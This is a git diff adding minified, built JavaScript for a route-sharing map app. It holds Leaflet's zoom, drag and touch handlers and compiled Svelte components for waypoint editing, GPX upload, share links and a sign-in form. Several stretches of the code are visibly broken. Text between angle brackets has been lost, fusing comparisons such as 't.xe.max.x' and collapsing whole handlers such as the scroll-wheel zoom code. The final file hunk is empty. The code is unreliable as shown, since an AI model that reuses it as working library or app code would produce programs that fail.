this._pane},_resetState:function(){this._resetStateTimeout=0,this._moved=!1},_clearDeferredResetState:function(){this._resetStateTimeout!==0&&(clearTimeout(this._resetStateTimeout),this._resetStateTimeout=0)},_onMouseDown:function(t){if(!t.shiftKey||t.which!==1&&t.button!==1)return!1;this._clearDeferredResetState(),this._resetState(),le(),ni(),this._startPoint=this._map.mouseEventToContainerPoint(t),I(document,{contextmenu:Kt,mousemove:this._onMouseMove,mouseup:this._onMouseUp,keydown:this._onKeyDown},this)},_onMouseMove:function(t){this._moved||(this._moved=!0,this._box=U("div","leaflet-zoom-box",this._container),A(this._container,"leaflet-crosshair"),this._map.fire("boxzoomstart")),this._point=this._map.mouseEventToContainerPoint(t);var e=new Q(this._point,this._startPoint),i=e.getSize();nt(this._box,e.min),this._box.style.width=i.x+"px",this._box.style.height=i.y+"px"},_finish:function(){this._moved&&($(this._box),tt(this._container,"leaflet-crosshair")),ce(),oi(),K(document,{contextmenu:Kt,mousemove:this._onMouseMove,mouseup:this._onMouseUp,keydown:this._onKeyDown},this)},_onMouseUp:function(t){if(!(t.which!==1&&t.button!==1)&&(this._finish(),!!this._moved)){this._clearDeferredResetState(),this._resetStateTimeout=setTimeout(_(this._resetState,this),0);var e=new vt(this._map.containerPointToLatLng(this._startPoint),this._map.containerPointToLatLng(this._point));this._map.fitBounds(e).fire("boxzoomend",{boxZoomBounds:e})}},_onKeyDown:function(t){t.keyCode===27&&(this._finish(),this._clearDeferredResetState(),this._resetState())}});H.addInitHook("addHandler","boxZoom",On),H.mergeOptions({doubleClickZoom:!0});var Zn=Et.extend({addHooks:function(){this._map.on("dblclick",this._onDoubleClick,this)},removeHooks:function(){this._map.off("dblclick",this._onDoubleClick,this)},_onDoubleClick:function(t){var e=this._map,i=e.getZoom(),n=e.options.zoomDelta,o=t.originalEvent.shiftKey?i-n:i+n;e.options.doubleClickZoom==="center"?e.setZoom(o):e.setZoomAround(t.containerPoint,o)}});H.addInitHook("addHandler","doubleClickZoom",Zn),H.mergeOptions({dragging:!0,inertia:!0,inertiaDeceleration:3400,inertiaMaxSpeed:1/0,easeLinearity:.2,worldCopyJump:!1,maxBoundsViscosity:0});var In=Et.extend({addHooks:function(){if(!this._draggable){var t=this._map;this._draggable=new Ut(t._mapPane,t._container),this._draggable.on({dragstart:this._onDragStart,drag:this._onDrag,dragend:this._onDragEnd},this),this._draggable.on("predrag",this._onPreDragLimit,this),t.options.worldCopyJump&&(this._draggable.on("predrag",this._onPreDragWrap,this),t.on("zoomend",this._onZoomEnd,this),t.whenReady(this._onZoomEnd,this))}A(this._map._container,"leaflet-grab leaflet-touch-drag"),this._draggable.enable(),this._positions=[],this._times=[]},removeHooks:function(){tt(this._map._container,"leaflet-grab"),tt(this._map._container,"leaflet-touch-drag"),this._draggable.disable()},moved:function(){return this._draggable&&this._draggable._moved},moving:function(){return this._draggable&&this._draggable._moving},_onDragStart:function(){var t=this._map;if(t._stop(),this._map.options.maxBounds&&this._map.options.maxBoundsViscosity){var e=it(this._map.options.maxBounds);this._offsetLimit=pt(this._map.latLngToContainerPoint(e.getNorthWest()).multiplyBy(-1),this._map.latLngToContainerPoint(e.getSouthEast()).multiplyBy(-1).add(this._map.getSize())),this._viscosity=Math.min(1,Math.max(0,this._map.options.maxBoundsViscosity))}else this._offsetLimit=null;t.fire("movestart").fire("dragstart"),t.options.inertia&&(this._positions=[],this._times=[])},_onDrag:function(t){if(this._map.options.inertia){var e=this._lastTime=+new Date,i=this._lastPos=this._draggable._absPos||this._draggable._newPos;this._positions.push(i),this._times.push(e),this._prunePositions(e)}this._map.fire("move",t).fire("drag",t)},_prunePositions:function(t){for(;this._positions.length>1&&t-this._times[0]>50;)this._positions.shift(),this._times.shift()},_onZoomEnd:function(){var t=this._map.getSize().divideBy(2),e=this._map.latLngToLayerPoint([0,0]);this._initialWorldOffset=e.subtract(t).x,this._worldWidth=this._map.getPixelWorldBounds().getSize().x},_viscousLimit:function(t,e){return t-(t-e)*this._viscosity},_onPreDragLimit:function(){if(!(!this._viscosity||!this._offsetLimit)){var t=this._draggable._newPos.subtract(this._draggable._startPos),e=this._offsetLimit;t.xe.max.x&&(t.x=this._viscousLimit(t.x,e.max.x)),t.y>e.max.y&&(t.y=this._viscousLimit(t.y,e.max.y)),this._draggable._newPos=this._draggable._startPos.add(t)}},_onPreDragWrap:function(){var t=this._worldWidth,e=Math.round(t/2),i=this._initialWorldOffset,n=this._draggable._newPos.x,o=(n-e+i)%t+e-i,s=(n+e+i)%t-e-i,r=Math.abs(o+i)0?s:-s))-e;this._delta=0,this._startTime=null,r&&(t.options.scrollWheelZoom==="center"?t.setZoom(e+r):t.setZoomAround(this._lastMousePos,e+r))}});H.addInitHook("addHandler","scrollWheelZoom",Bn);var rs=600;H.mergeOptions({tapHold:T.touchNative&&T.safari&&T.mobile,tapTolerance:15});var Nn=Et.extend({addHooks:function(){I(this._map._container,"touchstart",this._onDown,this)},removeHooks:function(){K(this._map._container,"touchstart",this._onDown,this)},_onDown:function(t){if(clearTimeout(this._holdTimeout),t.touches.length===1){var e=t.touches[0];this._startPos=this._newPos=new E(e.clientX,e.clientY),this._holdTimeout=setTimeout(_(function(){this._cancel(),this._isTapValid()&&(I(document,"touchend",ut),I(document,"touchend touchcancel",this._cancelClickPrevent),this._simulateEvent("contextmenu",e))},this),rs),I(document,"touchend touchcancel contextmenu",this._cancel,this),I(document,"touchmove",this._onMove,this)}},_cancelClickPrevent:function t(){K(document,"touchend",ut),K(document,"touchend touchcancel",t)},_cancel:function(){clearTimeout(this._holdTimeout),K(document,"touchend touchcancel contextmenu",this._cancel,this),K(document,"touchmove",this._onMove,this)},_onMove:function(t){var e=t.touches[0];this._newPos=new E(e.clientX,e.clientY)},_isTapValid:function(){return this._newPos.distanceTo(this._startPos)<=this._map.options.tapTolerance},_simulateEvent:function(t,e){var i=new MouseEvent(t,{bubbles:!0,cancelable:!0,view:window,screenX:e.screenX,screenY:e.screenY,clientX:e.clientX,clientY:e.clientY});i._simulated=!0,e.target.dispatchEvent(i)}});H.addInitHook("addHandler","tapHold",Nn),H.mergeOptions({touchZoom:T.touch,bounceAtZoomLimits:!0});var Dn=Et.extend({addHooks:function(){A(this._map._container,"leaflet-touch-zoom"),I(this._map._container,"touchstart",this._onTouchStart,this)},removeHooks:function(){tt(this._map._container,"leaflet-touch-zoom"),K(this._map._container,"touchstart",this._onTouchStart,this)},_onTouchStart:function(t){var e=this._map;if(!(!t.touches||t.touches.length!==2||e._animatingZoom||this._zooming)){var i=e.mouseEventToContainerPoint(t.touches[0]),n=e.mouseEventToContainerPoint(t.touches[1]);this._centerPoint=e.getSize()._divideBy(2),this._startLatLng=e.containerPointToLatLng(this._centerPoint),e.options.touchZoom!=="center"&&(this._pinchStartLatLng=e.containerPointToLatLng(i.add(n)._divideBy(2))),this._startDist=i.distanceTo(n),this._startZoom=e.getZoom(),this._moved=!1,this._zooming=!0,e._stop(),I(document,"touchmove",this._onTouchMove,this),I(document,"touchend touchcancel",this._onTouchEnd,this),ut(t)}},_onTouchMove:function(t){if(!(!t.touches||t.touches.length!==2||!this._zooming)){var e=this._map,i=e.mouseEventToContainerPoint(t.touches[0]),n=e.mouseEventToContainerPoint(t.touches[1]),o=i.distanceTo(n)/this._startDist;if(this._zoom=e.getScaleZoom(o,this._startZoom),!e.options.bounceAtZoomLimits&&(this._zoome.getMaxZoom()&&o>1)&&(this._zoom=e._limitZoom(this._zoom)),e.options.touchZoom==="center"){if(this._center=this._startLatLng,o===1)return}else{var s=i._add(n)._divideBy(2)._subtract(this._centerPoint);if(o===1&&s.x===0&&s.y===0)return;this._center=e.unproject(e.project(this._pinchStartLatLng,this._zoom).subtract(s),this._zoom)}this._moved||(e._moveStart(!0,!1),this._moved=!0),dt(this._animRequest);var r=_(e._move,e,this._center,this._zoom,{pinch:!0,round:!1},void 0);this._animRequest=X(r,this,!0),ut(t)}},_onTouchEnd:function(){if(!this._moved||!this._zooming){this._zooming=!1;return}this._zooming=!1,dt(this._animRequest),K(document,"touchmove",this._onTouchMove,this),K(document,"touchend touchcancel",this._onTouchEnd,this),this._map.options.zoomAnimation?this._map._animateZoom(this._center,this._map._limitZoom(this._zoom),!0,this._map.options.zoomSnap):this._map._resetView(this._center,this._map._limitZoom(this._zoom))}});H.addInitHook("addHandler","touchZoom",Dn),H.BoxZoom=On,H.DoubleClickZoom=Zn,H.Drag=In,H.Keyboard=An,H.ScrollWheelZoom=Bn,H.TapHold=Nn,H.TouchZoom=Dn,h.Bounds=Q,h.Browser=T,h.CRS=Zt,h.Canvas=Sn,h.Circle=yi,h.CircleMarker=Ie,h.Class=lt,h.Control=Mt,h.DivIcon=Tn,h.DivOverlay=zt,h.DomEvent=bo,h.DomUtil=xo,h.Draggable=Ut,h.Evented=Ht,h.FeatureGroup=It,h.GeoJSON=Bt,h.GridLayer=ve,h.Handler=Et,h.Icon=ee,h.ImageOverlay=Re,h.LatLng=j,h.LatLngBounds=vt,h.Layer=Ct,h.LayerGroup=te,h.LineUtil=No,h.Map=H,h.Marker=Ze,h.Mixin=zo,h.Path=Vt,h.Point=E,h.PolyUtil=Oo,h.Polygon=ie,h.Polyline=At,h.Popup=Fe,h.PosAnimation=an,h.Projection=Do,h.Rectangle=zn,h.Renderer=Nt,h.SVG=ye,h.SVGOverlay=bn,h.TileLayer=oe,h.Tooltip=He,h.Transformation=Ge,h.Util=Le,h.VideoOverlay=Ln,h.bind=_,h.bounds=pt,h.canvas=kn,h.circle=qo,h.circleMarker=Go,h.control=_e,h.divIcon=es,h.extend=l,h.featureGroup=Wo,h.geoJSON=xn,h.geoJson=Yo,h.gridLayer=is,h.icon=Uo,h.imageOverlay=Jo,h.latLng=F,h.latLngBounds=it,h.layerGroup=Ho,h.map=To,h.marker=Vo,h.point=Z,h.polygon=Ko,h.polyline=jo,h.popup=$o,h.rectangle=ss,h.setOptions=k,h.stamp=g,h.svg=En,h.svgOverlay=Qo,h.tileLayer=Mn,h.tooltip=ts,h.transformation=re,h.version=d,h.videoOverlay=Xo;var as=window.L;h.noConflict=function(){return window.L=as,this},window.L=h})})(Ti,Ti.exports);var Cs=Ti.exports;const Jt=Ms(Cs);function Ss(m){let f,h,d,l,w,_,P,g,W,S;return{c(){f=D("div"),h=D("p"),d=D("b"),l=Dt(m[0]),w=yt(),_=D("p"),P=Dt(m[1]),g=yt(),W=D("p"),S=Dt(m[2]),this.h()},l(v){f=R(v,"DIV",{style:!0});var b=Y(f);h=R(b,"P",{});var p=Y(h);d=R(p,"B",{});var x=Y(d);l=Rt(x,m[0]),x.forEach(O),p.forEach(O),w=wt(b),_=R(b,"P",{});var k=Y(_);P=Rt(k,m[1]),k.forEach(O),g=wt(b),W=R(b,"P",{});var ft=Y(W);S=Rt(ft,m[2]),ft.forEach(O),b.forEach(O),this.h()},h(){ct(f,"width","100%"),ct(f,"text-align","center")},m(v,b){st(v,f,b),B(f,h),B(h,d),B(d,l),B(f,w),B(f,_),B(_,P),B(f,g),B(f,W),B(W,S)},p(v,b){b&1&&xe(l,v[0]),b&2&&xe(P,v[1]),b&4&&xe(S,v[2])},d(v){v&&O(f)}}}function ks(m){let f,h="Delete",d,l,w,_,P,g,W,S,v,b;return{c(){f=D("button"),f.textContent=h,d=yt(),l=D("div"),w=Dt(`Title:
+ `),_=D("input"),P=Dt(`
+ Description:
+ `),g=D("input"),W=Dt(`
+ Comment:
+ `),S=D("input"),this.h()},l(p){f=R(p,"BUTTON",{class:!0,"data-svelte-h":!0}),we(f)!=="svelte-1m4hfbw"&&(f.textContent=h),d=wt(p),l=R(p,"DIV",{style:!0});var x=Y(l);w=Rt(x,`Title:
+ `),_=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),P=Rt(x,`
+ Description:
+ `),g=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),W=Rt(x,`
+ Comment:
+ `),S=R(x,"INPUT",{class:!0,type:!0,name:!0,style:!0}),x.forEach(O),this.h()},h(){z(f,"class","button is-small is-danger"),z(_,"class","input is-static"),z(_,"type","text"),z(_,"name","title"),ct(_,"width","100%"),ct(_,"text-align","center"),ct(_,"font-weight","600"),z(g,"class","input is-static"),z(g,"type","text"),z(g,"name","desc"),ct(g,"width","100%"),ct(g,"text-align","center"),ct(g,"font-weight","600"),z(S,"class","input is-static"),z(S,"type","text"),z(S,"name","desc"),ct(S,"width","100%"),ct(S,"text-align","center"),ct(S,"font-weight","600"),ct(l,"width","100%"),ct(l,"text-align","center"),ct(l,"font-weight","400")},m(p,x){st(p,f,x),st(p,d,x),st(p,l,x),B(l,w),B(l,_),Ot(_,m[0]),B(l,P),B(l,g),Ot(g,m[1]),B(l,W),B(l,S),Ot(S,m[2]),v||(b=[bt(f,"click",m[5]),bt(_,"change",m[4]),bt(_,"input",m[6]),bt(g,"change",m[4]),bt(g,"input",m[7]),bt(S,"change",m[4]),bt(S,"input",m[8])],v=!0)},p(p,x){x&1&&_.value!==p[0]&&Ot(_,p[0]),x&2&&g.value!==p[1]&&Ot(g,p[1]),x&4&&S.value!==p[2]&&Ot(S,p[2])},d(p){p&&(O(f),O(d),O(l)),v=!1,Ci(b)}}}function Es(m){let f;function h(w,_){return w[3]?ks:Ss}let d=h(m),l=d(m);return{c(){f=D("div"),l.c()},l(w){f=R(w,"DIV",{});var _=Y(f);l.l(_),_.forEach(O)},m(w,_){st(w,f,_),l.m(f,null)},p(w,[_]){d===(d=h(w))&&l?l.p(w,_):(l.d(1),l=d(w),l&&(l.c(),l.m(f,null)))},i:Pe,o:Pe,d(w){w&&O(f),l.d()}}}function zs(m,f,h){const d=ps();let{title:l}=f,{desc:w}=f,{comment:_}=f,{editable:P}=f;function g(){d("change",{title:l,desc:w,comment:_})}function W(){d("delete",{title:l})}function S(){l=this.value,h(0,l)}function v(){w=this.value,h(1,w)}function b(){_=this.value,h(2,_)}return m.$$set=p=>{"title"in p&&h(0,l=p.title),"desc"in p&&h(1,w=p.desc),"comment"in p&&h(2,_=p.comment),"editable"in p&&h(3,P=p.editable)},[l,w,_,P,g,W,S,v,b]}class Os extends Si{constructor(f){super(),ki(this,f,zs,Es,Mi,{title:0,desc:1,comment:2,editable:3})}}function Zs(m){let f,h,d,l,w;return{c(){f=D("link"),h=yt(),d=D("div"),this.h()},l(_){f=R(_,"LINK",{rel:!0,href:!0,integrity:!0,crossorigin:!0}),h=wt(_),d=R(_,"DIV",{class:!0,style:!0}),Y(d).forEach(O),this.h()},h(){z(f,"rel","stylesheet"),z(f,"href","https://unpkg.com/leaflet@1.6.0/dist/leaflet.css"),z(f,"integrity","sha512-xwE/Az9zrjBIphAcBb3F6JVqxf46+CDLwfLMHloNu6KEQCAWi6HcDUbeOfBIptF7tcCzusKFjFw2yuvEpDL9wQ=="),z(f,"crossorigin",""),z(d,"class","map"),ct(d,"height","400px"),ct(d,"width","100%")},m(_,P){st(_,f,P),st(_,h,P),st(_,d,P),l||(w=vs(m[0].call(null,d)),l=!0)},p:Pe,i:Pe,o:Pe,d(_){_&&(O(f),O(h),O(d)),l=!1,w()}}}function Is(m){if(m.track_points.length>0){let f=m.track_points[0];return[parseFloat(f.lat)||0,parseFloat(f.lon)||0]}return[55.8283,37.5795]}function As(m,f,h){let{route:d}=f,{editable:l}=f,w;function _(v,b,p){let x;v.bindPopup(()=>{let k=Jt.DomUtil.create("div");return x=b(k),k}),v.on("dragend",k=>{p(k.target.getLatLng())}),v.on("popupclose",()=>{if(x){let k=x;x=null,setTimeout(()=>{k.$destroy()},500)}})}function P(){let v=[];for(let b of d.track_points)v.push([parseFloat(b.lat)||0,parseFloat(b.lon)||0]);return Jt.polyline(v,{color:"#E4E",opacity:.5})}function g(v){let b=Is(d),p=Jt.map(v,{preferCanvas:!0}).setView(b,10);return p.attributionControl.setPrefix(""),Jt.tileLayer("https://{s}.basemaps.cartocdn.com/rastertiles/voyager/{z}/{x}/{y}{r}.png",{attribution:`©OpenStreetMap ,
+ ©CARTO `,subdomains:"abcd",maxZoom:14}).addTo(p),p}function W(){w.eachLayer(function(p){p instanceof Jt.LayerGroup&&w.removeLayer(p)});let v=Jt.layerGroup(),b=P();for(let[p,x]of d.waypoints.entries()){let k=[parseFloat(x.lat)||0,parseFloat(x.lon)||0],ft=Jt.marker(k,{draggable:l});_(ft,V=>{let rt=new Os({target:V,props:{title:x.name,desc:x.desc,comment:x.comment,editable:l}});return rt.$on("change",q=>{const M=q.detail;h(1,d.waypoints[p].name=M.title,d),h(1,d.waypoints[p].desc=M.desc,d),h(1,d.waypoints[p].comment=M.comment,d)}),rt.$on("delete",q=>{d.waypoints.splice(p,1),W()}),rt},V=>{h(1,d.waypoints[p].lat=V.lat.toString(),d),h(1,d.waypoints[p].lon=V.lng.toString(),d)}),v.addLayer(ft)}v.addTo(w),b.addTo(w)}function S(v){w=g(v),W()}return m.$$set=v=>{"route"in v&&h(1,d=v.route),"editable"in v&&h(2,l=v.editable)},[S,d,l]}class Bs extends Si{constructor(f){super(),ki(this,f,As,Zs,Mi,{route:1,editable:2})}}function Un(m){let f,h;return{c(){f=D("div"),h=Dt(m[1]),this.h()},l(d){f=R(d,"DIV",{class:!0});var l=Y(f);h=Rt(l,m[1]),l.forEach(O),this.h()},h(){z(f,"class","notification is-danger")},m(d,l){st(d,f,l),B(f,h)},p(d,l){l&2&&xe(h,d[1])},d(d){d&&O(f)}}}function Ns(m){let f,h,d,l,w;return{c(){f=D("div"),h=D("div"),d=D("a"),l=Dt("Share"),this.h()},l(_){f=R(_,"DIV",{});var P=Y(f);h=R(P,"DIV",{class:!0});var g=Y(h);d=R(g,"A",{href:!0});var W=Y(d);l=Rt(W,"Share"),W.forEach(O),g.forEach(O),P.forEach(O),this.h()},h(){z(d,"href",w="/route/"+m[0].id+"?token="+m[0].share_token),z(h,"class","container")},m(_,P){st(_,f,P),B(f,h),B(h,d),B(d,l)},p(_,P){P&1&&w!==(w="/route/"+_[0].id+"?token="+_[0].share_token)&&z(d,"href",w)},d(_){_&&O(f)}}}function Ds(m){let f,h,d,l,w,_,P,g='Upload a GPX file ',W,S,v,b,p,x,k="Upload",ft,V,rt="",q,M,G,mt="Save",Tt,Ft,J=m[2]&&m[2].length>0&&Vn(m);return{c(){f=D("div"),h=D("div"),d=D("div"),l=D("label"),w=D("input"),_=yt(),P=D("span"),P.innerHTML=g,W=yt(),S=D("span"),J&&J.c(),v=yt(),b=D("div"),p=D("div"),x=D("button"),x.textContent=k,ft=yt(),V=D("div"),V.innerHTML=rt,q=yt(),M=D("div"),G=D("button"),G.textContent=mt,this.h()},l(ht){f=R(ht,"DIV",{class:!0});var X=Y(f);h=R(X,"DIV",{class:!0});var dt=Y(h);d=R(dt,"DIV",{class:!0});var Le=Y(d);l=R(Le,"LABEL",{class:!0});var lt=Y(l);w=R(lt,"INPUT",{class:!0,type:!0,name:!0,id:!0}),_=wt(lt),P=R(lt,"SPAN",{class:!0,"data-svelte-h":!0}),we(P)!=="svelte-1yfha46"&&(P.innerHTML=g),W=wt(lt),S=R(lt,"SPAN",{class:!0});var be=Y(S);J&&J.l(be),be.forEach(O),lt.forEach(O),Le.forEach(O),dt.forEach(O),X.forEach(O),v=wt(ht),b=R(ht,"DIV",{class:!0});var et=Y(b);p=R(et,"DIV",{class:!0});var Ht=Y(p);x=R(Ht,"BUTTON",{class:!0,"data-svelte-h":!0}),we(x)!=="svelte-1big487"&&(x.textContent=k),Ht.forEach(O),ft=wt(et),V=R(et,"DIV",{class:!0,"data-svelte-h":!0}),we(V)!=="svelte-1gc3yf9"&&(V.innerHTML=rt),q=wt(et),M=R(et,"DIV",{class:!0});var E=Y(M);G=R(E,"BUTTON",{class:!0,"data-svelte-h":!0}),we(G)!=="svelte-155muy4"&&(G.textContent=mt),E.forEach(O),et.forEach(O),this.h()},h(){z(w,"class","file-input"),z(w,"type","file"),z(w,"name","file"),z(w,"id","file"),z(P,"class","file-cta"),z(S,"class","file-name"),z(l,"class","file-label"),z(d,"class","file"),z(h,"class","column is-half is-offset-one-quarter"),z(f,"class","columns is-centered"),z(x,"class","button is-info"),z(p,"class","column is-one-third has-text-centered"),z(V,"class","column is-one-third has-text-centered"),z(G,"class","button is-primary"),z(M,"class","column is-one-third has-text-centered"),z(b,"class","columns is-centered")},m(ht,X){st(ht,f,X),B(f,h),B(h,d),B(d,l),B(l,w),B(l,_),B(l,P),B(l,W),B(l,S),J&&J.m(S,null),st(ht,v,X),st(ht,b,X),B(b,p),B(p,x),B(b,ft),B(b,V),B(b,q),B(b,M),B(M,G),Tt||(Ft=[bt(w,"change",m[9]),bt(x,"click",m[4]),bt(G,"click",m[5])],Tt=!0)},p(ht,X){ht[2]&&ht[2].length>0?J?J.p(ht,X):(J=Vn(ht),J.c(),J.m(S,null)):J&&(J.d(1),J=null)},d(ht){ht&&(O(f),O(v),O(b)),J&&J.d(),Tt=!1,Ci(Ft)}}}function Vn(m){let f=m[2][0].name+"",h;return{c(){h=Dt(f)},l(d){h=Rt(d,f)},m(d,l){st(d,h,l)},p(d,l){l&4&&f!==(f=d[2][0].name+"")&&xe(h,f)},d(d){d&&O(h)}}}function Rs(m){let f,h,d,l,w,_,P,g,W,S,v,b,p,x,k,ft,V=m[1]&&Un(m),rt=m[3]&&Ns(m);v=new Bs({props:{route:m[0],editable:m[3]}});let q=m[3]&&Ds(m);return{c(){V&&V.c(),f=yt(),h=D("section"),d=D("div"),l=D("input"),w=yt(),_=D("div"),P=D("input"),g=yt(),rt&&rt.c(),W=yt(),S=D("section"),gs(v.$$.fragment),b=yt(),p=D("section"),q&&q.c(),this.h()},l(M){V&&V.l(M),f=wt(M),h=R(M,"SECTION",{class:!0});var G=Y(h);d=R(G,"DIV",{class:!0});var mt=Y(d);l=R(mt,"INPUT",{class:!0,type:!0,placeholder:!0}),w=wt(mt),_=R(mt,"DIV",{class:!0});var Tt=Y(_);P=R(Tt,"INPUT",{class:!0,type:!0,placeholder:!0}),g=wt(Tt),rt&&rt.l(Tt),Tt.forEach(O),mt.forEach(O),G.forEach(O),W=wt(M),S=R(M,"SECTION",{});var Ft=Y(S);ys(v.$$.fragment,Ft),Ft.forEach(O),b=wt(M),p=R(M,"SECTION",{class:!0});var J=Y(p);q&&q.l(J),J.forEach(O),this.h()},h(){z(l,"class","input title is-static"),z(l,"type","text"),z(l,"placeholder","Title"),l.readOnly=!m[3],z(P,"class","input is-static"),z(P,"type","text"),z(P,"placeholder","Description"),P.readOnly=!m[3],z(_,"class","subtitle"),z(d,"class","hero-body"),z(h,"class","hero"),z(p,"class","section")},m(M,G){V&&V.m(M,G),st(M,f,G),st(M,h,G),B(h,d),B(d,l),Ot(l,m[0].title),B(d,w),B(d,_),B(_,P),Ot(P,m[0].description),B(_,g),rt&&rt.m(_,null),st(M,W,G),st(M,S,G),ws(v,S,null),st(M,b,G),st(M,p,G),q&&q.m(p,null),x=!0,k||(ft=[bt(l,"input",m[7]),bt(P,"input",m[8])],k=!0)},p(M,[G]){M[1]?V?V.p(M,G):(V=Un(M),V.c(),V.m(f.parentNode,f)):V&&(V.d(1),V=null),G&1&&l.value!==M[0].title&&Ot(l,M[0].title),G&1&&P.value!==M[0].description&&Ot(P,M[0].description),M[3]&&rt.p(M,G);const mt={};G&1&&(mt.route=M[0]),v.$set(mt),M[3]&&q.p(M,G)},i(M){x||(Ps(v.$$.fragment,M),x=!0)},o(M){xs(v.$$.fragment,M),x=!1},d(M){M&&(O(f),O(h),O(W),O(S),O(b),O(p)),V&&V.d(M),rt&&rt.d(),Ls(v),q&&q.d(),k=!1,Ci(ft)}}}function Fs(m,f,h){let{data:d}=f,l=d.route,w=d.error,_=l.user_id===d.user.id,P;async function g(){if(!P||P.length===0)return;let p=new FormData;p.append("file",P[0]);const x=await fetch(`${bi}/route/${l.id}/upload`,{method:"POST",body:p,credentials:"include"});if(x.ok){h(0,l=await x.json()),h(2,P=null),await Wn();return}h(1,w=await x.text());try{h(1,w=JSON.parse(w).detail.error)}catch(k){console.log(k)}}async function W(){const p=await fetch(`${bi}/route/${l.id}/update`,{method:"POST",body:JSON.stringify({title:l.title,description:l.description,track_points:l.track_points,waypoints:l.waypoints}),credentials:"include",headers:{"Content-Type":"application/json"}});if(p.ok){h(0,l=await p.json()),h(2,P=null),await Wn();return}h(1,w=await p.text());try{h(1,w=JSON.parse(w).detail.error)}catch(x){console.log(x)}}function S(){l.title=this.value,h(0,l)}function v(){l.description=this.value,h(0,l)}function b(){P=this.files,h(2,P)}return m.$$set=p=>{"data"in p&&h(6,d=p.data)},[l,w,P,_,g,W,d,S,v,b]}class qs extends Si{constructor(f){super(),ki(this,f,Fs,Rs,Mi,{data:6})}}export{qs as component,Gs as universal};
diff --git a/services/explorers/front/build/_app/immutable/nodes/6.85392252.js b/services/explorers/front/build/_app/immutable/nodes/6.85392252.js
new file mode 100644
index 0000000..ba0098e
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/6.85392252.js
@@ -0,0 +1 @@
+import{s as re,f as l,a as N,g as i,h as f,d as o,c as V,u as X,j as e,i as A,v as s,H as le,M as ie,l as oe,m as ce,n as de}from"../chunks/scheduler.1f572272.js";import{S as ue,i as fe,b as Y,d as Z,m as ee,a as te,t as se,e as ae}from"../chunks/index.b942bf85.js";import{g as pe,i as me}from"../chunks/navigation.872e8737.js";import{P as he,L as ve}from"../chunks/LockClosed.36d30438.js";import{P as _e}from"../chunks/public.aa8ed6af.js";function ne(h){let a,d,t;return{c(){a=l("div"),d=l("div"),t=oe(h[0]),this.h()},l(r){a=i(r,"DIV",{class:!0});var p=f(a);d=i(p,"DIV",{class:!0});var m=f(d);t=ce(m,h[0]),m.forEach(o),p.forEach(o),this.h()},h(){e(d,"class","notification is-danger"),e(a,"class","container")},m(r,p){A(r,a,p),s(a,d),s(d,t)},p(r,p){p&1&&de(t,r[0])},d(r){r&&o(a)}}}function ge(h){let a,d,t,r,p='',m,v,_,u,y,g,I,H,D,w,U,L,$,P,j,b,S,B,T,J='
',x,F,R,c=h[0]&&ne(h);return w=new he({}),S=new ve({}),{c(){a=l("section"),c&&c.c(),d=N(),t=l("section"),r=l("div"),r.innerHTML=p,m=N(),v=l("div"),_=l("div"),u=l("form"),y=l("div"),g=l("p"),I=l("input"),H=N(),D=l("span"),Y(w.$$.fragment),U=N(),L=l("div"),$=l("p"),P=l("input"),j=N(),b=l("span"),Y(S.$$.fragment),B=N(),T=l("div"),T.innerHTML=J,this.h()},l(n){a=i(n,"SECTION",{class:!0});var E=f(a);c&&c.l(E),E.forEach(o),d=V(n),t=i(n,"SECTION",{class:!0});var M=f(t);r=i(M,"DIV",{class:!0,"data-svelte-h":!0}),X(r)!=="svelte-15twxn6"&&(r.innerHTML=p),m=V(M),v=i(M,"DIV",{class:!0});var q=f(v);_=i(q,"DIV",{class:!0});var z=f(_);u=i(z,"FORM",{});var C=f(u);y=i(C,"DIV",{class:!0});var G=f(y);g=i(G,"P",{class:!0});var O=f(g);I=i(O,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),H=V(O),D=i(O,"SPAN",{class:!0});var K=f(D);Z(w.$$.fragment,K),K.forEach(o),O.forEach(o),G.forEach(o),U=V(C),L=i(C,"DIV",{class:!0});var Q=f(L);$=i(Q,"P",{class:!0});var k=f($);P=i(k,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),j=V(k),b=i(k,"SPAN",{class:!0});var W=f(b);Z(S.$$.fragment,W),W.forEach(o),k.forEach(o),Q.forEach(o),B=V(C),T=i(C,"DIV",{class:!0,"data-svelte-h":!0}),X(T)!=="svelte-8i1fac"&&(T.innerHTML=J),C.forEach(o),z.forEach(o),q.forEach(o),M.forEach(o),this.h()},h(){e(a,"class","section"),e(r,"class","columns is-centered"),e(I,"class","input"),e(I,"name","username"),e(I,"type","text"),e(I,"placeholder","Username"),e(D,"class","icon is-small is-left"),e(g,"class","control has-icons-left has-icons-right"),e(y,"class","field"),e(P,"class","input"),e(P,"name","password"),e(P,"type","password"),e(P,"placeholder","Password"),e(b,"class","icon is-small is-left"),e($,"class","control has-icons-left"),e(L,"class","field"),e(T,"class","field"),e(_,"class","column is-half has-text-centered"),e(v,"class","columns is-centered"),e(t,"class","section")},m(n,E){A(n,a,E),c&&c.m(a,null),A(n,d,E),A(n,t,E),s(t,r),s(t,m),s(t,v),s(v,_),s(_,u),s(u,y),s(y,g),s(g,I),s(g,H),s(g,D),ee(w,D,null),s(u,U),s(u,L),s(L,$),s($,P),s($,j),s($,b),ee(S,b,null),s(u,B),s(u,T),x=!0,F||(R=le(u,"submit",ie(h[1])),F=!0)},p(n,[E]){n[0]?c?c.p(n,E):(c=ne(n),c.c(),c.m(a,null)):c&&(c.d(1),c=null)},i(n){x||(te(w.$$.fragment,n),te(S.$$.fragment,n),x=!0)},o(n){se(w.$$.fragment,n),se(S.$$.fragment,n),x=!1},d(n){n&&(o(a),o(d),o(t)),c&&c.d(),ae(w),ae(S),F=!1,R()}}}function $e(h,a,d){let t;async function r(p){const m=new FormData(p.currentTarget);let v=m.get("username"),_=m.get("password");try{const u=await fetch(`${_e}/signin`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({username:v,password:_})});if(u.ok){await pe("/",{invalidateAll:!0});return}d(0,t=await u.text());try{d(0,t=JSON.parse(t).detail.error)}catch{}}catch(u){d(0,t=u.toString())}await me()}return[t,r]}class Se extends ue{constructor(a){super(),fe(this,a,$e,ge,re,{})}}export{Se as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/6.99c00b50.js b/services/explorers/front/build/_app/immutable/nodes/6.99c00b50.js
new file mode 100644
index 0000000..cd38adb
--- /dev/null
